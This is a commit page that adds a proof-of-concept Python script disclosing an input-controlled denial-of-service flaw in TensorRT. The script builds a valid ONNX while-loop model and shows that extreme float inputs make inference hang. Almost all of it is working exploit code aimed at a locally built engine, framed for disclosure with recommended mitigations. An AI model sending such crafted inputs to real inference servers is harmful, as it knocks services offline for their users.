treforbenbow commited on
Commit
b057c21
·
verified ·
1 Parent(s): 0c3443b

Upload vuln004_input_dos.py with huggingface_hub

Browse files
Files changed (1) hide show
  1. vuln004_input_dos.py +289 -0
vuln004_input_dos.py ADDED
@@ -0,0 +1,289 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """
2
+ VULN-004 PoC: TensorRT Input-Controlled Denial of Service via While-Loop Models
3
+
4
+ A structurally valid ONNX model using a condition-dependent Loop operator hangs
5
+ indefinitely during inference when given a malicious input value. The model itself
6
+ is indistinguishable from a legitimate while-loop model.
7
+
8
+ This is DISTINCT from VULN-003 (static Loop trip count):
9
+ - VULN-003: Malicious MODEL with INT64_MAX max_trip_count -> always hangs
10
+ - VULN-004: Normal MODEL + malicious INPUT -> hangs based on input value
11
+ - VULN-003 fix (validate max_trip_count at build) does NOT prevent VULN-004
12
+ - VULN-004 requires runtime protection (inference timeout / iteration budget)
13
+
14
+ Attack scenarios:
15
+ 1. Production model uses while-loop for variable-length processing
16
+ 2. Attacker sends input with extreme counter value (e.g., 1e30)
17
+ 3. Inference hangs indefinitely — DoS on the inference server
18
+ 4. Affects TensorRT-LLM (autoregressive generation uses loops)
19
+ 5. Affects any TRT model with data-dependent loop termination
20
+
21
+ Impact:
22
+ - Any TRT model using condition-dependent loops is vulnerable
23
+ - Attacker only needs to craft the INPUT, not the model
24
+ - Tiny payload (single float32 value) causes permanent hang
25
+ - No inference timeout in execute_async_v3()
26
+ """
27
+ import os
28
+ import sys
29
+ import time
30
+ import subprocess
31
+ import numpy as np
32
+ import onnx
33
+ from onnx import helper, TensorProto, numpy_helper
34
+
35
+ POC_DIR = os.path.dirname(os.path.abspath(__file__))
36
+
37
+
38
+ def create_while_loop_model():
39
+ """Create a LEGITIMATE while-loop model that counts down a counter.
40
+
41
+ This is a common pattern in ML models for variable-length processing.
42
+ The model decrements a counter each iteration, stopping when it reaches 0.
43
+ With a normal counter (e.g., 10), it runs 10 iterations and returns 0.
44
+ With a malicious counter (e.g., 1e30), it hangs for astronomical time.
45
+ """
46
+ # Loop body: decrement counter, check if > 0
47
+ body = helper.make_graph(
48
+ [
49
+ # x_out = x_in - 1.0
50
+ helper.make_node('Sub', ['x_in', 'one'], ['x_out']),
51
+ # cond_out = (x_out > 0.0)
52
+ helper.make_node('Greater', ['x_out', 'zero'], ['cond_out']),
53
+ ],
54
+ 'while_body',
55
+ [helper.make_tensor_value_info('i', TensorProto.INT64, []),
56
+ helper.make_tensor_value_info('cond_in', TensorProto.BOOL, []),
57
+ helper.make_tensor_value_info('x_in', TensorProto.FLOAT, [])],
58
+ [helper.make_tensor_value_info('cond_out', TensorProto.BOOL, []),
59
+ helper.make_tensor_value_info('x_out', TensorProto.FLOAT, [])],
60
+ [numpy_helper.from_array(np.array(1.0, dtype=np.float32), 'one'),
61
+ numpy_helper.from_array(np.array(0.0, dtype=np.float32), 'zero')]
62
+ )
63
+
64
+ # Main graph: Loop with max_trip=INT64_MAX, condition-dependent termination
65
+ X = helper.make_tensor_value_info('counter', TensorProto.FLOAT, [])
66
+ Y = helper.make_tensor_value_info('output', TensorProto.FLOAT, [])
67
+
68
+ # max_trip_count is INT64_MAX but the loop is expected to terminate via condition
69
+ max_trip = numpy_helper.from_array(
70
+ np.array(0x7FFFFFFFFFFFFFFF, dtype=np.int64), 'max_trip'
71
+ )
72
+ cond_init = numpy_helper.from_array(np.array(True, dtype=bool), 'cond_init')
73
+
74
+ loop = helper.make_node(
75
+ 'Loop', ['max_trip', 'cond_init', 'counter'], ['output'],
76
+ body=body
77
+ )
78
+
79
+ graph = helper.make_graph([loop], 'while_loop', [X], [Y], [max_trip, cond_init])
80
+ model = helper.make_model(graph, opset_imports=[helper.make_opsetid('', 13)])
81
+ model.ir_version = 7
82
+ return model
83
+
84
+
85
+ def create_accumulator_model():
86
+ """A more realistic model: accumulates values until threshold is reached.
87
+
88
+ Simulates a model that processes elements until a running sum exceeds a target.
89
+ With normal input (target=100), terminates quickly.
90
+ With malicious input (target=1e38), hangs effectively forever.
91
+ """
92
+ body = helper.make_graph(
93
+ [
94
+ # acc_out = acc_in + step
95
+ helper.make_node('Add', ['acc_in', 'step'], ['acc_out']),
96
+ # cond_out = (acc_out < target_in)
97
+ helper.make_node('Less', ['acc_out', 'target_in'], ['cond_out']),
98
+ ],
99
+ 'accum_body',
100
+ [helper.make_tensor_value_info('i', TensorProto.INT64, []),
101
+ helper.make_tensor_value_info('cond_in', TensorProto.BOOL, []),
102
+ helper.make_tensor_value_info('acc_in', TensorProto.FLOAT, []),
103
+ helper.make_tensor_value_info('target_in', TensorProto.FLOAT, [])],
104
+ [helper.make_tensor_value_info('cond_out', TensorProto.BOOL, []),
105
+ helper.make_tensor_value_info('acc_out', TensorProto.FLOAT, []),
106
+ helper.make_tensor_value_info('target_in', TensorProto.FLOAT, [])],
107
+ [numpy_helper.from_array(np.array(1.0, dtype=np.float32), 'step')]
108
+ )
109
+
110
+ acc_init = helper.make_tensor_value_info('init_value', TensorProto.FLOAT, [])
111
+ target = helper.make_tensor_value_info('target', TensorProto.FLOAT, [])
112
+ acc_out = helper.make_tensor_value_info('final_acc', TensorProto.FLOAT, [])
113
+ target_out = helper.make_tensor_value_info('target_passthrough', TensorProto.FLOAT, [])
114
+
115
+ max_trip = numpy_helper.from_array(
116
+ np.array(0x7FFFFFFFFFFFFFFF, dtype=np.int64), 'max_trip'
117
+ )
118
+ cond_init = numpy_helper.from_array(np.array(True, dtype=bool), 'cond_init')
119
+
120
+ loop = helper.make_node(
121
+ 'Loop', ['max_trip', 'cond_init', 'init_value', 'target'],
122
+ ['final_acc', 'target_passthrough'],
123
+ body=body
124
+ )
125
+
126
+ graph = helper.make_graph(
127
+ [loop], 'accumulator',
128
+ [acc_init, target],
129
+ [acc_out, target_out],
130
+ [max_trip, cond_init]
131
+ )
132
+ model = helper.make_model(graph, opset_imports=[helper.make_opsetid('', 13)])
133
+ model.ir_version = 7
134
+ return model
135
+
136
+
137
+ def build_engine(model_path, engine_path):
138
+ """Build TensorRT engine from ONNX model."""
139
+ import tensorrt as trt
140
+
141
+ logger = trt.Logger(trt.Logger.WARNING)
142
+ builder = trt.Builder(logger)
143
+ network = builder.create_network(
144
+ 1 << int(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH)
145
+ )
146
+ parser = trt.OnnxParser(network, logger)
147
+
148
+ if not parser.parse_from_file(model_path):
149
+ for i in range(parser.num_errors):
150
+ print(f" Parse error: {parser.get_error(i)}")
151
+ return False
152
+
153
+ config = builder.create_builder_config()
154
+ config.set_memory_pool_limit(trt.MemoryPoolType.WORKSPACE, 1 << 24)
155
+
156
+ serialized = builder.build_serialized_network(network, config)
157
+ if not serialized:
158
+ print(" Build failed")
159
+ return False
160
+
161
+ with open(engine_path, 'wb') as f:
162
+ f.write(bytes(serialized))
163
+ return True
164
+
165
+
166
+ def test_inference(engine_path, counter_value, timeout=15):
167
+ """Run inference with a specific counter value."""
168
+ script = f'''
169
+ import tensorrt as trt, torch, sys, time
170
+
171
+ with open(r"{engine_path}", "rb") as f:
172
+ data = f.read()
173
+
174
+ logger = trt.Logger(trt.Logger.ERROR)
175
+ runtime = trt.Runtime(logger)
176
+ engine = runtime.deserialize_cuda_engine(data)
177
+ if not engine:
178
+ print("DESER_FAIL"); sys.exit(1)
179
+
180
+ context = engine.create_execution_context()
181
+ device = torch.device("cuda:0")
182
+
183
+ counter = torch.tensor({counter_value}, dtype=torch.float32, device=device)
184
+ output = torch.empty(1, dtype=torch.float32, device=device)
185
+
186
+ context.set_tensor_address("counter", counter.data_ptr())
187
+ context.set_tensor_address("output", output.data_ptr())
188
+
189
+ stream = torch.cuda.current_stream()
190
+ print("INFERENCE_STARTED")
191
+ sys.stdout.flush()
192
+ start = time.time()
193
+ context.execute_async_v3(stream.cuda_stream)
194
+ stream.synchronize()
195
+ elapsed = time.time() - start
196
+ print(f"DONE time={{elapsed:.3f}}s output={{output.item():.1f}}")
197
+ '''
198
+ start = time.time()
199
+ try:
200
+ r = subprocess.run(
201
+ [sys.executable, "-c", script],
202
+ capture_output=True, text=True, timeout=timeout
203
+ )
204
+ elapsed = time.time() - start
205
+ return False, elapsed, r.stdout.strip(), r.returncode
206
+ except subprocess.TimeoutExpired:
207
+ elapsed = time.time() - start
208
+ return True, elapsed, "TIMEOUT", -1
209
+
210
+
211
+ def main():
212
+ print("=" * 70)
213
+ print("VULN-004: Input-Controlled DoS via While-Loop Models")
214
+ print("=" * 70)
215
+
216
+ # Step 1: Create the while-loop model
217
+ model = create_while_loop_model()
218
+ onnx_path = os.path.join(POC_DIR, "while_loop.onnx")
219
+ with open(onnx_path, 'wb') as f:
220
+ f.write(model.SerializeToString())
221
+
222
+ onnx_size = os.path.getsize(onnx_path)
223
+ print(f"\n[1] While-loop ONNX model: {onnx_path}")
224
+ print(f" Size: {onnx_size} bytes")
225
+ print(f" Behavior: Counts down from input value to 0")
226
+ print(f" Structure: Perfectly valid -- common ML pattern")
227
+
228
+ # Step 2: Build TensorRT engine
229
+ engine_path = os.path.join(POC_DIR, "while_loop.engine")
230
+ print(f"\n[2] Building TensorRT engine...")
231
+ if not build_engine(onnx_path, engine_path):
232
+ print(" ERROR: Build failed")
233
+ sys.exit(1)
234
+
235
+ engine_size = os.path.getsize(engine_path)
236
+ print(f" Engine: {engine_path}")
237
+ print(f" Size: {engine_size} bytes")
238
+ print(f" Build completed normally -- model is structurally valid")
239
+
240
+ # Step 3: Normal usage (benign inputs)
241
+ print(f"\n[3] Normal inference with benign inputs")
242
+ for counter_val in [10, 100, 1000]:
243
+ hung, elapsed, out, rc = test_inference(engine_path, float(counter_val), timeout=10)
244
+ lines = out.split('\n')
245
+ result = lines[-1] if lines else f"rc={rc}"
246
+ print(f" counter={counter_val:>6d}: {result} ({elapsed:.2f}s)")
247
+
248
+ # Step 4: DoS attack (malicious input)
249
+ print(f"\n[4] DoS attack with malicious inputs")
250
+ for counter_val, desc in [
251
+ (1e6, "1 million iterations"),
252
+ (1e9, "1 billion iterations"),
253
+ (1e15, "1 quadrillion iterations"),
254
+ (1e30, "1e30 iterations (astronomical)"),
255
+ (3.4e38, "FLT_MAX iterations (maximum float32)"),
256
+ ]:
257
+ hung, elapsed, out, rc = test_inference(engine_path, counter_val, timeout=15)
258
+ if hung:
259
+ print(f" counter={counter_val:>12.0e}: TIMEOUT after {elapsed:.1f}s — HANGING")
260
+ else:
261
+ lines = out.split('\n')
262
+ result = lines[-1] if lines else f"rc={rc}"
263
+ print(f" counter={counter_val:>12.0e}: {result} ({elapsed:.1f}s)")
264
+
265
+ # Step 5: Show the attack is input-dependent
266
+ print(f"\n[5] Same model, same engine — behavior depends entirely on input")
267
+ print(f" counter=10 -> completes instantly (10 iterations)")
268
+ print(f" counter=1e30 -> hangs for 1e30 iterations")
269
+ print(f" At 1 billion iterations/sec: 3.17e13 YEARS")
270
+
271
+ # Summary
272
+ print(f"\n{'='*70}")
273
+ print("VULNERABILITY SUMMARY")
274
+ print(f"{'='*70}")
275
+ print(f"[!!!] Input-controlled DoS via while-loop model")
276
+ print(f"[!!!] Model is structurally VALID — cannot be detected by static analysis")
277
+ print(f"[!!!] ONNX size: {onnx_size} bytes | Engine size: {engine_size} bytes")
278
+ print(f"[!!!] DoS triggered by input value, NOT by model structure")
279
+ print(f"[!!!] VULN-003 fix (validate max_trip_count) does NOT prevent this")
280
+ print(f"[!!!] Requires runtime protection: inference timeout / iteration budget")
281
+ print(f"[!!!] Affects any TRT model using data-dependent loops")
282
+ print(f"[!!!] Relevant to TensorRT-LLM autoregressive generation")
283
+
284
+ # Cleanup temp files
285
+ # Keep the while_loop files as evidence
286
+
287
+
288
+ if __name__ == "__main__":
289
+ main()